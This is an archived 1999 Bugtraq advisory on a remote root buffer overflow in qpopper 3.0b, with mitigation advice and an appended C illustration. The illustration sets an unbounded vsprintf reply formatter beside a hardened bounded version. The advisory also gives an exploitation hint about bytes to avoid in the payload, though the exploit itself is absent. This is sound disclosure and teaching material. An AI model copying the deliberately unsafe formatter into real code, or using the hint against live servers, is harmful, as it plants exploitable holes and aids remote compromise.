[12773] in bugtraq
serious Qpopper 3.0 vulnerability
daemon@ATHENA.MIT.EDU (Mixter)
Tue Nov 30 12:14:45 1999
Date: Tue, 30 Nov 1999 01:53:11 +0100
Reply-To: Mixter <mixter@NEWYORKOFFICE.COM>
From: Mixter <mixter@NEWYORKOFFICE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,

There is a remote buffer overflow in the qpop 3.0 server code that can lead to remote root compromise. Exploit attached.

Vulnerable versions are all versions of qpop 3.0b; affected operating systems are _all_ systems that run it. Versions 2.52 and 2.53 do not contain this bug. The latest version available is 3.0b20, which is vulnerable, along with all previous 3.0 versions.

I advise everyone running qpop 3.0b servers to shut down the server IMMEDIATELY by disabling the entry in inetd.conf and then downgrading to v2.53 or another program until an official patch has been released.

Details: The buffer overflow(s) are present in pop_msg.c (sounds familiar..) starting at line 68. All configurations and different builds seem to be vulnerable, as either vsprintf or sprintf is used, neither of which checks bounds on the input buffers for each argument.

Exploiting: The overflow code should not contain the characters 0x0c/0x17/0x20, because it would get interpreted as more than one argument and hence fail.

Patching: I included a small patch. You should only use unofficial patches if you totally need to use version 3.0; otherwise downgrade and wait for a patch from Qualcomm. IF you patch this yourself, please consider that the buffer pointer CHANGES and the buffer is about 30 bytes LESS than the defined MAXLINELEN!!

PS: The installation file suggests running qpopper without tcpd, e.g.:

    pop3 stream tcp nowait root /usr/local/lib/qpopper qpopper -s

I would NOT suggest doing it that way. Use:

    pop3 stream tcp nowait root /usr/sbin/tcpd qpopper -s

instead. At least for me it works behind a tcp wrapper, and that way you can use access control and every connection _attempt_ gets logged.

Mixter
________________________
mixter@newyorkoffice.com
members.tripod.com/mixtersecurity
[Attachments, contents not included in this archive copy: q3smash.c, qp3b20.patch]
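As an added illustration for readers of the archive (this is neither the advisory's attached code nor qpopper's actual pop_msg.c, which is not reproduced here), the following reconstructs the unbounded two-step reply formatting the post describes and sets it beside a bounded version that honours the "buffer pointer CHANGES" caveat, i.e. the second write is limited by what is left after the prefix, not by the whole buffer. MAXLINELEN, the function names and the reply layout are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MAXLINELEN 1024   /* assumed line-buffer size; stands in for qpopper's own constant */
static char reply[MAXLINELEN];   /* scratch reply buffer for the checks below */

/* The pattern the advisory describes: a status prefix is written, the pointer
 * moves past it, then the caller's format is expanded with no bound at all. */
int format_reply_unsafe(char *buf, int ok, const char *fmt, ...)
{
    va_list ap;
    char *p = buf + sprintf(buf, "%s ", ok ? "+OK" : "-ERR");
    va_start(ap, fmt);
    p += vsprintf(p, fmt, ap);   /* an oversized %s argument runs off the end of buf */
    va_end(ap);
    strcpy(p, "\r\n");
    return (int)(p - buf);
}

/* Hardened form: every write is bounded by what is actually left, recomputed
 * after the prefix moved the pointer (the "buffer pointer CHANGES" caveat).
 * Returns bytes written, or -1 if it did not fit (send a fixed error instead). */
int format_reply_safe(char *buf, size_t buflen, int ok, const char *fmt, ...)
{
    va_list ap;
    size_t used;
    int n = snprintf(buf, buflen, "%s ", ok ? "+OK" : "-ERR");
    if (n < 0 || (size_t)n >= buflen) return -1;
    used = (size_t)n;
    va_start(ap, fmt);
    n = vsnprintf(buf + used, buflen - used, fmt, ap);   /* bound = remaining, not buflen */
    va_end(ap);
    if (n < 0 || (size_t)n + 3 > buflen - used) { buf[0] = '\0'; return -1; }  /* text + CRLF + NUL */
    used += (size_t)n;
    memcpy(buf + used, "\r\n", 3);
    return (int)(used + 2);
}

/* Self-check: an argument twice the buffer size must be rejected without
 * touching a canary byte placed just past the logical buffer. */
int overrun_blocked(void)
{
    char buf[MAXLINELEN + 1], big[2 * MAXLINELEN];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    buf[MAXLINELEN] = 'Z';
    return format_reply_safe(buf, MAXLINELEN, 0, "no such user %s", big) == -1
           && buf[MAXLINELEN] == 'Z';
}
```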